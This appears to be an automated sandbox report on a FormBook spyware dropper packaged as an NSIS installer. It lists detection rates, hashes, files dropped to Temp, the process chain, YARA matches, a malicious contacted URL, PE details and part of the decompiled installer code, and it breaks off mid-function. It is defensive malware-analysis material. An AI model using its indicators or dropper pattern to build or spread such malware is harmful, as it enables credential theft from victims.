SecuriteInfo.com.Trojan.NSISX.Spy.Gen.2.8452.exe	41%	Virustotal		Browse
SecuriteInfo.com.Trojan.NSISX.Spy.Gen.2.8452.exe	34%	ReversingLabs	Win32.Trojan.Nsisx

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\miylwnpd.exe	20%	Virustotal		Browse
C:\Users\user\AppData\Local\Temp\miylwnpd.exe	24%	ReversingLabs	Win32.Trojan.Midie

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
1.2.miylwnpd.exe.2cb0000.1.unpack	100%	Avira	TR/Crypt.ZPACK.Gen		Download File

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
www.beamaster.info/p0ip/	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

⊘No contacted domains info

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
www.beamaster.info/p0ip/	true	Avira URL Cloud: safe	low

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://nsis.sf.net/NSIS_ErrorError	SecuriteInfo.com.Trojan.NSISX.Spy.Gen.2.8452.exe	false		high

World Map of Contacted IPs

⊘No contacted IP infos

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	626424
Start date and time: 14/05/202200:37:34	2022-05-14 00:37:34 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 4m 54s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	SecuriteInfo.com.Trojan.NSISX.Spy.Gen.2.8452.17207 (renamed file extension from 17207 to exe)
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	22
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal84.troj.winEXE@5/4@0/0
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 99.8% (good quality ratio 94.3%) Quality average: 83.4% Quality standard deviation: 27.2%
HCA Information:	Successful, ratio: 100% Number of executed functions: 31 Number of non-executed functions: 35
Cookbook Comments:	Adjust boot time Enable AMSI

Warnings

Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
Excluded IPs from analysis (whitelisted): 23.211.6.115
Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, fs.microsoft.com, login.live.com, store-images.s-microsoft.com, sls.update.microsoft.com, store-images.s-microsoft.com-c.edgekey.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com

Simulations

Behavior and APIs

⊘No simulations

Joe Sandbox View / Context

IPs

⊘No context

Domains

⊘No context

ASNs

⊘No context

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

C:\Users\user\AppData\Local\Temp\miylwnpd.exe

Download File

Process:	C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSISX.Spy.Gen.2.8452.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80384
Entropy (8bit):	6.294028811173466
Encrypted:	false
SSDEEP:	1536:XsTaC+v1CUfr0oxAomP3cX/4pi2sWjcdjXI:ua5wUD1/ui5j4
MD5:	FF4C2F4D6E1FA34E8B958993C0DE134D
SHA1:	8E8DE477AD67E1B107396B8B9BE749363EF10640
SHA-256:	38DD484E87FBD4520A99EAD1FDC0010F45A3D5F8A22B1BBD01E3FCBD56104AB3
SHA-512:	D64482AB140944CF138E47914EFD3EE2362E0FE98D519A89EAE6D31E03E9C51BFCBB4D44BA634526F393613F0AD8C14971BA240DBF2560BC57FF1C3705967F36
Malicious:	true
Antivirus:	Antivirus: Virustotal, Detection: 20%, Browse Antivirus: ReversingLabs, Detection: 24%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........w...w...w...%`..w...%^..w...%a.w......w...w..w..p....w..p.~..w..p....w..Rich.w..................PE..L.....~b............................7.............@.......................................@..................................$.......p..................................T...............................@............................................text...U........................... ..`.rdata...N.......P..................@..@.data... 1...0......................@....rsrc........p.......*..............@..@.reloc...............,..............@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nsaF211.tmp

Download File

Process:	C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSISX.Spy.Gen.2.8452.exe
File Type:	data
Category:	dropped
Size (bytes):	274424
Entropy (8bit):	7.537223383847658
Encrypted:	false
SSDEEP:	3072:5vonGilTM+lGDSQ7923iyT+7EqtxRuNfpzqk2POHpfA6zIya5wUD1/ui5j4:5von9M+0eQ79IoTtcC6fA6zmwQu
MD5:	0A075A0200A53ACFD831038EC6C896F1
SHA1:	07E7D01FA876F8A37EE6FE1FAA34BA6C97A8E402
SHA-256:	DF91BE25213DA8243E34DCCBE3017FD53F9F493DD516D9D55263501375BA4122
SHA-512:	F43698C1374F37CD9F2F64866E611A8F0E98CE0107094AD1AB2AE1158E9993DE5586B4F8A8869414805C80DC88E40B9791172D9CC8CAC36DC1E34DB03E5F8445
Malicious:	false
Reputation:	low
Preview:	.3......,...................h...T%.......2.......3..........................................................................................................................................................................................................................................G...................j...............................................................................................................................^.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\qaodb6jx48te

Download File

Process:	C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSISX.Spy.Gen.2.8452.exe
File Type:	data
Category:	dropped
Size (bytes):	175615
Entropy (8bit):	7.990059953409327
Encrypted:	true
SSDEEP:	3072:2vonGilTM+lGDSQ7923iyT+7EqtxRuNfpzqk2POHpfA6zY:2von9M+0eQ79IoTtcC6fA6zY
MD5:	6EB3509F6E43EEA8950ADBC156A96248
SHA1:	019A49C79CFB4503F005BA4347FD5EBF8C99718E
SHA-256:	F203F8DB5CFD1E17D03DD57BA2766F15F2A189E80080089C673BED271C87CDB7
SHA-512:	95F99448679A60B2707DE05E3D348CFB4F6E4112E2780ED53CC6E540C7493A0169316EBEAF992274D4474B8F36FEA5357CD2794AD8AA77CC6FEC2C48CC892CD9
Malicious:	false
Reputation:	low
Preview:	...PH....[!...X............#....._=.Be...>.....i.`..n.......%.m.8..$./L.+..S..9.1.64.%....W5..,.?....Cj/..f.1}8.....)i..5B\.......i...Ym....V.32Ay.+8y.-.............].U.v..:...m.0.......E}.7j....q9......Y..G.}....Z..N.........{!........O.O.0.....a%\|x....^H....x.".1".'q...<.....=.Xe...>......i.`..n........,....c...74..=rlp.....{.9..GZ.^.........HX.7Ab.%.V.)i..5B<..E...].....6..$........0...@...>..a,./_....n.M:f=.:.....0..S....E..7j...oq......h.OG.}....Z...../......{!W.......O.........a,\|x....G..Z.x."..".5'q......._=.Be...>.....i.`..n........,....c...74..=rlp.....{.9..GZ.^.........HX.7Ab.%.V.)i..5B<..E...].....6..$........0...@...>..a,./_....n.U.v..:...P.0."S....E}.7j...oq.........G.}....Z...../......{!W.......O.........a,\|x....G..Z.x."..".5'q......._=.Be...>.....i.`..n........,....c...74..=rlp.....{.9..GZ.^.........HX.7Ab.%.V.)i..5B<..E...].....6..$........0...@...>..a,./_....n.U.v..:...P.0."S....E}.7j...oq.........G.}....Z...../..

C:\Users\user\AppData\Local\Temp\zehirtbl

Download File

Process:	C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSISX.Spy.Gen.2.8452.exe
File Type:	data
Category:	dropped
Size (bytes):	5171
Entropy (8bit):	6.118274194888097
Encrypted:	false
SSDEEP:	96:BXrtcxDxcjguWPxAcgUAyF1DQHWF3yW5SSn/MLmyJo3XFWDNbxUuyFxFV04mxkzq:2WguW5TAquH8cSn/MLmyJo3XFWZAFnRw
MD5:	ACB8234D1D848397EC3B1EB59A25AC91
SHA1:	7D17F048DDC6D19A40898B6079D36E0E1BDAB195
SHA-256:	942BD175D04B7C5567EB7F3EABC39866736B8922C68539D16DA9A32A839B5820
SHA-512:	601CA88B29149B9DDADECF29BBBBAAE1B626B84AE8C7BD580EB7BDF64FB3CDC9CD20563EFAEA229640194CE27684024EA62C8DE148E81CC045C40E9AFCB77459
Malicious:	false
Reputation:	low
Preview:	..%...........].".M."..m".M."...u.J.qE.....Y.r.!r....u..v.....U..Qr.!r....u..k.....=..9r.!r....u..<.....e..ar.!r....u........M..I.....7.%..M...!...m..i.......d.......q..L.?...Z\....q..O..q....Y.i].........)(fF.qr.U.r.=.r.e..r.M..r.m.r...[....!Z...Y-....]r.U...%"(..]..q.....J.).......) f..Y...]...dO!.....".M."..u..%..6.!.-..%.......L..L...u..q..%....%....u..qdO!...wK..........O....rR..........O%.. ...........O%.....E".M."..J.u......U..q..u.....qK....q..q..u..u.i..(...M...%..%..d... U.. Q...%.Ll... U.. Q...%..M...(U...rR.f.....?prr..Y."..r.%..rrr..Y..Y.....]...J.]......]dO.......".M."..J.uE.....M..q..u.....qK....q..q..u..u.i......M".......%..%..d... M.. I..!..%.Ll... M.. I.....%.<l.. M.. I....d.%..?....M...I...%.Ll... M.. I.(.%..M...(M...wK.o......qrr..Y.....%........r..r..r..r.!r.%.4srr..Y..Y.....]...J.]......]dO.......J.u......i..q..u.....qK....q..q..u..u.i......M...%..%..d... i.. ...!..%.Ll... i.. ....%..M...(i.. ..H.....Aqrr..Y.#r.!r.%..pr

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.333983439825163
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	SecuriteInfo.com.Trojan.NSISX.Spy.Gen.2.8452.exe
File size:	428316
MD5:	14848f52302c15e27b26fee5fada11c1
SHA1:	04d62d915bd1a81c4b5ed35df6edb953107398c8
SHA256:	4ac982ea35522a13de30ff7ddbbec9becf2c7528a48f0aff377e3d6758a7ae7b
SHA512:	aee08da4569bc969db4c086cb89950e311aaab9bf94677d9ba532b256ed5a29cc5942d48ca7c58ec8bee095d8e84b1f91935d61a9c601e1f9950c93a4ddd99c3
SSDEEP:	6144:eOtIldxqG7hiusCwlvcyHQOEYf5iTQuuAxjNnmJvLtVeV+hLk7:eORQiuqEyHH1GtNnmFBi+lg
TLSH:	B694E092D5C041A5EC794B34B53B1D3A16A7FFB9BCF9EA8E864D71312B732C2401B942
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!`G.@...@...@../OQ..@...@..I@../OS..@...c>..@..+F...@..Rich.@..........................PE..L.....Oa.................h....:....

File Icon


Icon Hash:	81090f232b232380

Static PE Info

General

Entrypoint:	0x403646
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:	NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x614F9AA9 [Sat Sep 25 21:54:49 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	61259b55b8912888e90f516ca08dc514

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
sub esp, 000003F4h
push ebx
push esi
push edi
push 00000020h
pop edi
xor ebx, ebx
push 00008001h
mov dword ptr [ebp-14h], ebx
mov dword ptr [ebp-04h], 0040A230h
mov dword ptr [ebp-10h], ebx
call dword ptr [004080C8h]
mov esi, dword ptr [004080CCh]
lea eax, dword ptr [ebp-00000140h]
push eax
mov dword ptr [ebp-0000012Ch], ebx
mov dword ptr [ebp-2Ch], ebx
mov dword ptr [ebp-28h], ebx
mov dword ptr [ebp-00000140h], 0000011Ch
call esi
test eax, eax
jne 00007F16FCE2A37Ah
lea eax, dword ptr [ebp-00000140h]
mov dword ptr [ebp-00000140h], 00000114h
push eax
call esi
mov ax, word ptr [ebp-0000012Ch]
mov ecx, dword ptr [ebp-00000112h]
sub ax, 00000053h
add ecx, FFFFFFD0h
neg ax
sbb eax, eax
mov byte ptr [ebp-26h], 00000004h
not eax
and eax, ecx
mov word ptr [ebp-2Ch], ax
cmp dword ptr [ebp-0000013Ch], 0Ah
jnc 00007F16FCE2A34Ah
and word ptr [ebp-00000132h], 0000h
mov eax, dword ptr [ebp-00000134h]
movzx ecx, byte ptr [ebp-00000138h]
mov dword ptr [007A8B58h], eax
xor eax, eax
mov ah, byte ptr [ebp-0000013Ch]
movzx eax, ax
or eax, ecx
xor ecx, ecx
mov ch, byte ptr [ebp-2Ch]
movzx ecx, cx
shl eax, 10h
or eax, ecx

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x8504	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x3b9000	0x28ee8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x2b0	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x67c4	0x6800	False	0.675180288462	data	6.49518266675	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x139a	0x1400	False	0.4498046875	data	5.14106681717	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xa000	0x39ebb8	0x600	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.ndata	0x3a9000	0x10000	0x0	False	0	empty	0.0	IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x3b9000	0x28ee8	0x29000	False	0.555979658918	data	5.77947429109	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x3b9280	0x10828	data	English	United States
RT_ICON	0x3c9aa8	0x1013c	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States
RT_ICON	0x3d9be8	0x4228	dBase IV DBT of \200.DBF, blocks size 0, block length 16384, next free block index 40, next free block 4294901499, next used block 4294901499	English	United States
RT_ICON	0x3dde10	0x25a8	dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 4294901501, next used block 4294901757	English	United States
RT_ICON	0x3e03b8	0x10a8	dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 4294967294, next used block 4294967294	English	United States
RT_ICON	0x3e1460	0x468	GLS_BINARY_LSB_FIRST	English	United States
RT_DIALOG	0x3e18c8	0x100	data	English	United States
RT_DIALOG	0x3e19c8	0x11c	data	English	United States
RT_DIALOG	0x3e1ae8	0x60	data	English	United States
RT_GROUP_ICON	0x3e1b48	0x5a	data	English	United States
RT_MANIFEST	0x3e1ba8	0x33e	XML 1.0 document, ASCII text, with very long lines, with no line terminators	English	United States

Imports

DLL	Import
ADVAPI32.dll	RegCreateKeyExW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, SetFileSecurityW, RegOpenKeyExW, RegEnumValueW
SHELL32.dll	SHGetSpecialFolderLocation, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, ShellExecuteExW, SHGetFileInfoW
ole32.dll	OleInitialize, OleUninitialize, CoCreateInstance, IIDFromString, CoTaskMemFree
COMCTL32.dll	ImageList_Create, ImageList_Destroy, ImageList_AddMasked
USER32.dll	GetClientRect, EndPaint, DrawTextW, IsWindowEnabled, DispatchMessageW, wsprintfA, CharNextA, CharPrevW, MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, GetSystemMetrics, FillRect, AppendMenuW, TrackPopupMenu, OpenClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, PeekMessageW, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, EmptyClipboard, CreatePopupMenu
GDI32.dll	SetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectW, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
KERNEL32.dll	GetExitCodeProcess, WaitForSingleObject, GetModuleHandleA, GetProcAddress, GetSystemDirectoryW, lstrcatW, Sleep, lstrcpyA, WriteFile, GetTempFileNameW, lstrcmpiA, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, CreateFileW, GetTickCount, MulDiv, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, MoveFileExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

⊘No network behavior found

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

Behavior

Click to jump to process

System Behavior

Analysis Process: SecuriteInfo.com.Trojan.NSISX.Spy.Gen.2.8452.exePID: 5944, Parent PID: 5072

General

Target ID:	0
Start time:	00:38:34
Start date:	14/05/2022
Path:	C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSISX.Spy.Gen.2.8452.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSISX.Spy.Gen.2.8452.exe"
Imagebase:	0x400000
File size:	428316 bytes
MD5 hash:	14848F52302C15E27B26FEE5FADA11C1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: miylwnpd.exePID: 3908, Parent PID: 5944

General

Target ID:	1
Start time:	00:38:36
Start date:	14/05/2022
Path:	C:\Users\user\AppData\Local\Temp\miylwnpd.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\miylwnpd.exe C:\Users\user\AppData\Local\Temp\zehirtbl
Imagebase:	0x2e0000
File size:	80384 bytes
MD5 hash:	FF4C2F4D6E1FA34E8B958993C0DE134D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.233653327.0000000002CB0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.233653327.0000000002CB0000.00000004.00001000.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.233653327.0000000002CB0000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Antivirus matches:	Detection: 20%, Virustotal, Browse Detection: 24%, ReversingLabs
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: miylwnpd.exePID: 1900, Parent PID: 3908

General

Target ID:	2
Start time:	00:38:37
Start date:	14/05/2022
Path:	C:\Users\user\AppData\Local\Temp\miylwnpd.exe
Wow64 process (32bit):
Commandline:	C:\Users\user\AppData\Local\Temp\miylwnpd.exe C:\Users\user\AppData\Local\Temp\zehirtbl
Imagebase:
File size:	80384 bytes
MD5 hash:	FF4C2F4D6E1FA34E8B958993C0DE134D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: SecuriteInfo.com.Trojan.NSISX.Spy.Gen.2.8452.exePID: 5944, Parent PID: 5072COMMON

Execution Graph

Execution Coverage:	16.5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	16.3%
Total number of Nodes:	1372
Total number of Limit Nodes:	22

Executed Functions

Function 00403646 Relevance: 91.4, APIs: 34, Strings: 18, Instructions: 450
stringfilecomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 78%

			_entry_() {
				WCHAR* _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				int _v24;
				int _v28;
				struct _TOKEN_PRIVILEGES _v40;
				signed char _v42;
				int _v44;
				signed int _v48;
				intOrPtr _v278;
				signed short _v310;
				struct _OSVERSIONINFOW _v324;
				struct _SHFILEINFOW _v1016;
				intOrPtr* _t88;
				WCHAR* _t92;
				char* _t94;
				void _t97;
				void* _t116;
				WCHAR* _t118;
				signed int _t119;
				intOrPtr* _t123;
				void* _t137;
				void* _t143;
				void* _t148;
				void* _t152;
				void* _t157;
				signed int _t167;
				void* _t170;
				void* _t175;
				intOrPtr _t177;
				intOrPtr _t178;
				intOrPtr* _t179;
				int _t188;
				void* _t189;
				void* _t198;
				signed int _t204;
				signed int _t209;
				signed int _t214;
				signed int _t216;
				int* _t218;
				signed int _t226;
				signed int _t229;
				CHAR* _t231;
				char* _t232;
				signed int _t233;
				WCHAR* _t234;
				void* _t250;

				_t216 = 0x20;
				_t188 = 0;
				_v24 = 0;
				_v8 = L"Error writing temporary file. Make sure your temp folder is valid.";
				_v20 = 0;
				SetErrorMode(0x8001); // executed
				_v324.szCSDVersion = 0;
				_v48 = 0;
				_v44 = 0;
				_v324.dwOSVersionInfoSize = 0x11c;
				if(GetVersionExW( &_v324) == 0) {
					_v324.dwOSVersionInfoSize = 0x114;
					GetVersionExW( &_v324);
					asm("sbb eax, eax");
					_v42 = 4;
					_v48 =  !( ~(_v324.szCSDVersion - 0x53)) & _v278 + 0xffffffd0;
				}
				if(_v324.dwMajorVersion < 0xa) {
					_v310 = _v310 & 0x00000000;
				}
				 *0x7a8b58 = _v324.dwBuildNumber;
				 *0x7a8b5c = (_v324.dwMajorVersion & 0x0000ffff | _v324.dwMinorVersion & 0x000000ff) << 0x00000010 | _v48 & 0x0000ffff | _v42 & 0x000000ff;
				if( *0x7a8b5e != 0x600) {
					_t179 = E00406A3B(_t188);
					if(_t179 != _t188) {
						 *_t179(0xc00);
					}
				}
				_t231 = "UXTHEME";
				do {
					E004069CB(_t231); // executed
					_t231 =  &(_t231[lstrlenA(_t231) + 1]);
				} while ( *_t231 != 0);
				E00406A3B(0xb);
				 *0x7a8aa4 = E00406A3B(9);
				_t88 = E00406A3B(7);
				if(_t88 != _t188) {
					_t88 =  *_t88(0x1e);
					if(_t88 != 0) {
						 *0x7a8b5c =  *0x7a8b5c | 0x00000080;
					}
				}
				__imp__#17();
				__imp__OleInitialize(_t188); // executed
				 *0x7a8b60 = _t88;
				SHGetFileInfoW(0x79ff48, _t188,  &_v1016, 0x2b4, _t188); // executed
				E0040666E(0x7a7aa0, L"NSIS Error");
				_t92 = GetCommandLineW();
				_t232 = L"\"C:\\Users\\jones\\Desktop\\SecuriteInfo.com.Trojan.NSISX.Spy.Gen.2.8452.exe\" ";
				E0040666E(_t232, _t92);
				_t94 = _t232;
				_t233 = 0x22;
				 *0x7a8aa0 = 0x400000;
				_t250 = L"\"C:\\Users\\jones\\Desktop\\SecuriteInfo.com.Trojan.NSISX.Spy.Gen.2.8452.exe\" " - _t233; // 0x22
				if(_t250 == 0) {
					_t216 = _t233;
					_t94 =  &M007B3002;
				}
				_t198 = CharNextW(E00405F6A(_t94, _t216));
				_v16 = _t198;
				while(1) {
					_t97 =  *_t198;
					_t251 = _t97 - _t188;
					if(_t97 == _t188) {
						break;
					}
					_t209 = 0x20;
					__eflags = _t97 - _t209;
					if(_t97 != _t209) {
						L17:
						__eflags =  *_t198 - _t233;
						_v12 = _t209;
						if( *_t198 == _t233) {
							_v12 = _t233;
							_t198 = _t198 + 2;
							__eflags = _t198;
						}
						__eflags =  *_t198 - 0x2f;
						if( *_t198 != 0x2f) {
							L32:
							_t198 = E00405F6A(_t198, _v12);
							__eflags =  *_t198 - _t233;
							if(__eflags == 0) {
								_t198 = _t198 + 2;
								__eflags = _t198;
							}
							continue;
						} else {
							_t198 = _t198 + 2;
							__eflags =  *_t198 - 0x53;
							if( *_t198 != 0x53) {
								L24:
								asm("cdq");
								asm("cdq");
								_t214 = L"NCRC" & 0x0000ffff;
								asm("cdq");
								_t226 = ( *0x40a37e & 0x0000ffff) << 0x00000010 |  *0x40a37c & 0x0000ffff | _t214;
								__eflags =  *_t198 - (( *0x40a37a & 0x0000ffff) << 0x00000010 | _t214);
								if( *_t198 != (( *0x40a37a & 0x0000ffff) << 0x00000010 | _t214)) {
									L29:
									asm("cdq");
									asm("cdq");
									_t209 = L" /D=" & 0x0000ffff;
									asm("cdq");
									_t229 = ( *0x40a372 & 0x0000ffff) << 0x00000010 |  *0x40a370 & 0x0000ffff | _t209;
									__eflags =  *(_t198 - 4) - (( *0x40a36e & 0x0000ffff) << 0x00000010 | _t209);
									if( *(_t198 - 4) != (( *0x40a36e & 0x0000ffff) << 0x00000010 | _t209)) {
										L31:
										_t233 = 0x22;
										goto L32;
									}
									__eflags =  *_t198 - _t229;
									if( *_t198 == _t229) {
										 *(_t198 - 4) = _t188;
										__eflags = _t198;
										E0040666E(L"C:\\Users\\jones\\AppData\\Local\\Temp", _t198);
										L37:
										_t234 = L"C:\\Users\\jones\\AppData\\Local\\Temp\\";
										GetTempPathW(0x400, _t234);
										_t116 = E00403615(_t198, _t251);
										_t252 = _t116;
										if(_t116 != 0) {
											L40:
											DeleteFileW(L"1033"); // executed
											_t118 = E004030D0(_t254, _v20); // executed
											_v8 = _t118;
											if(_t118 != _t188) {
												L68:
												ExitProcess(); // executed
												__imp__OleUninitialize(); // executed
												if(_v8 == _t188) {
													if( *0x7a8b34 == _t188) {
														L77:
														_t119 =  *0x7a8b4c;
														if(_t119 != 0xffffffff) {
															_v24 = _t119;
														}
														ExitProcess(_v24);
													}
													if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v16) != 0) {
														LookupPrivilegeValueW(_t188, L"SeShutdownPrivilege",  &(_v40.Privileges));
														_v40.PrivilegeCount = 1;
														_v28 = 2;
														AdjustTokenPrivileges(_v16, _t188,  &_v40, _t188, _t188, _t188);
													}
													_t123 = E00406A3B(4);
													if(_t123 == _t188) {
														L75:
														if(ExitWindowsEx(2, 0x80040002) != 0) {
															goto L77;
														}
														goto L76;
													} else {
														_push(0x80040002);
														_push(0x25);
														_push(_t188);
														_push(_t188);
														_push(_t188);
														if( *_t123() == 0) {
															L76:
															E0040140B(9);
															goto L77;
														}
														goto L75;
													}
												}
												E00405CCE(_v8, 0x200010);
												ExitProcess(2);
											}
											if( *0x7a8abc == _t188) {
												L51:
												 *0x7a8b4c =  *0x7a8b4c | 0xffffffff;
												_v24 = E00403D1D(_t264);
												goto L68;
											}
											_t218 = E00405F6A(L"\"C:\\Users\\jones\\Desktop\\SecuriteInfo.com.Trojan.NSISX.Spy.Gen.2.8452.exe\" ", _t188);
											if(_t218 < L"\"C:\\Users\\jones\\Desktop\\SecuriteInfo.com.Trojan.NSISX.Spy.Gen.2.8452.exe\" ") {
												L48:
